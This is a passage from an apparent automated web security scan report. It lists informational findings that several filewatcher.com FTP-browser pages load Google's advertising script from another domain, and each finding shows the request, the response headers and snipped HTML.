Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "AKYJ/k8RV8B12KgAp7vrbQ"
Content-Length: 25457
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 610
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.936. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "bstTqpE/X4sNnznlYpvFsQ"
Content-Length: 7188
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 593
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.937. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Wt5lY2/HmDndWCMnJ/i4JA"
Content-Length: 26794
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 595
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.938. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-6-stable/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:58 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Ythhfh8xcWnTZefvEzFOoQ"
Content-Length: 21993
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 597
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.939. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "v/Dobj7JEeTAnbN9jKlt9A"
Content-Length: 26901
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 598
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.940. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/ia64/packages-7-current/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ar0wWZSTmRPX5zMXs+9eTw"
Content-Length: 49111
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 603
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.941. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "KcmCEbJ1Kd752TO+jGEStQ"
Content-Length: 9040
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 553
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.942. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ic2iNGW8TaHFKGyCI1HoJQ"
Content-Length: 13995
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 555
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.943. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/Xu/3/TqbBldK8o2tQoZTA"
Content-Length: 8586
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 556
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.944. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages/i386.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.2/packages/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "CeNkzVXPrywNnDLAFK06tA"
Content-Length: 47776
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 564
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.945. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:49 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Vl+kF1abiglQoVBS7/evTw"
Content-Length: 12714
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 552
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.946. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:49 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "VfCZkla5r8qGX1gWzEXT1g"
Content-Length: 8593
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 558
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.947. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "snazfcS18nFjt5bq+Mynhw"
Content-Length: 23036
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 558
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.948. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WRd+PU7IhxgnzeOV/D+Glg"
Content-Length: 21639
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 557
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.949. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:19 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "S+3D58ROosl2x6DjOwFrpw"
Content-Length: 15524
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 690
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/ - FTP Browser<
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.950. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/mirrors.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:23 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "VqBsx7f5MuLGpM6anxVZpw"
Content-Length: 6970
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 701
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.951. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
